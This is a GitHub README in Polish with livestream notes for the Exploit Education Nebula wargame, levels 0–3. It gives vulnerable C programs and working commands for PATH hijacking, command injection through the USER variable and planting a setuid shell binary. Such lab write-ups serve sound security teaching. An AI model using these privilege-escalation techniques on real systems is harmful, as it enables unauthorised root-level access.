Skip to content
No description, website, or topics provided.
Branch: master
Clone or download

Latest commit

Fetching latest commit…
Cannot retrieve the latest commit at this time.

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore
README.md

README.md

Exploit Education: Nebula

Repozytorium pomocnicze dla livestreamów. Pracujemy na:

$ sha1sum ~/Downloads/exploit-exercises-nebula-5.iso
e82f807be06100bf3e048f82e899fb1fecc24e3a /Users/ad/Downloads/exploit-exercises-nebula-5.iso

Streamy dostępne poniżej:

Notatki

Level 0

Opis do zadania dostępny tutaj.

Szukamy flag00 po całym systemie plików:

level00@nebula:~$ find / | grep flag00
/bin/.../flag00
find: `/etc/chatscripts': Permission denied
find: `/etc/ppp/peers': Permission denied
find: `/etc/ssl/private': Permission denied
/home/flag00
/home/flag00/.bash_logout
/home/flag00/.bashrc
/home/flag00/.profile
find: `/home/flag01': Permission denied

[ ... ]

W opisie zadania było mówione o dziwnie wyglądającej ścieżce, /bin/... jest taką ścieżką:

level00@nebula:~$ cd /bin/.../
level00@nebula:/bin/...$ ls
flag00
level00@nebula:/bin/...$ whoami
level00
level00@nebula:/bin/...$ ./flag00
Congrats, now run getflag to get your flag!
flag00@nebula:/bin/...$ whoami
flag00
flag00@nebula:/bin/...$ /bin/getflag
You have successfully executed getflag on a target account

Level 1

Opis do zadania dostępny tutaj.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
 gid_t gid;
 uid_t uid;
 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 system("/usr/bin/env echo and now what?"); [1]
}

Linia [1] jest podatna na atak poprzez środowisko i link symboliczny:

level01@nebula:~$ /home/flag01/flag01
and now what?
level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ ls -alh
total 5.0K
drwxr-x--- 1 level01 level01  80 Mar 27 09:12 .
drwxr-xr-x 1 root  root   140 Aug 27 2012 ..
-rw-r--r-- 1 level01 level01 220 May 18 2011 .bash_logout
-rw-r--r-- 1 level01 level01 3.3K May 18 2011 .bashrc
drwx------ 2 level01 level01  60 Mar 27 09:12 .cache
-rw-r--r-- 1 level01 level01 675 May 18 2011 .profile
lrwxrwxrwx 1 level01 level01  12 Mar 27 09:12 echo -> /bin/getflag
level01@nebula:~$ /home/flag01/flag01
and now what?
level01@nebula:~$ ./echo
getflag is executing on a non-flag account, this doesn't count
level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ export PATH=/home/level01:$PATH
level01@nebula:~$ echo $PATH
/home/level01:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ /home/flag01/flag01
You have successfully executed getflag on a target account

Level 2

Opis do zadania dostępny tutaj.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
 char *buffer;

 gid_t gid;
 uid_t uid;

 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 buffer = NULL;

 asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); [1]
 printf("about to call system(\"%s\")\n", buffer);
 
 system(buffer); [2]
}

Prosty przykład podatności CMD Injection. W tym wypadku tworzony string zawiera zmienną środowiskową $USER [1], a następnie jest użyty przy wywołaniu funkcji system() [2].

level02@nebula:~$ export USER="&& /bin/getflag"
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo && /bin/getflag is cool")

You have successfully executed getflag on a target account

Level 3

Opis do zadania dostępny tutaj.

Na streamie problem z wykonaniem pliku SUID spowodowany był kompilacją pliku wykonywalnego do katalogu /tmp, który zamontowany jest w trybie nosuid:

level03@nebula:~$ mount | awk '$3 == "/tmp"'
tmpfs on /tmp type tmpfs (rw,nosuid,nodev)

Jeżeli zamienimy katalog na /home/flag03 (użytkownik flag03 musi mieć prawo pisania) to wszystko zadziała jak należy:

level03@nebula:/home/flag03/writable.d$ cat /tmp/pwn.c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	system("/bin/sh");
	return 0;
}
level03@nebula:/home/flag03/writable.d$ echo "gcc /tmp/pwn.c -o /home/flag03/pwn && chmod +s /home/flag03/pwn" > pwn.sh
level03@nebula:/home/flag03/writable.d$ cd ..
level03@nebula:/home/flag03$ ls -alh
total 18K
drwxr-x--- 1 flag03 level03 100 Mar 27 08:49 .
drwxr-xr-x 1 root  root   80 Aug 27 2012 ..
-rw------- 1 flag03 flag03  50 Mar 27 07:37 .bash_history
-rw-r--r-- 1 flag03 flag03  220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag03 flag03 3.3K May 18 2011 .bashrc
-rw-r--r-- 1 flag03 flag03  675 May 18 2011 .profile
-rwsrwsr-x 1 flag03 flag03 7.0K Mar 27 08:49 pwn
drwxrwxrwx 1 flag03 flag03  40 Mar 27 08:49 writable.d
-rwxr-xr-x 1 flag03 flag03  98 Nov 20 2011 writable.sh
level03@nebula:/home/flag03$ whoami
level03
level03@nebula:/home/flag03$ ./pwn
sh-4.2$ whoami
flag03
sh-4.2$ /bin/getflag
You have successfully executed getflag on a target account

Referencje

You can’t perform that action at this time.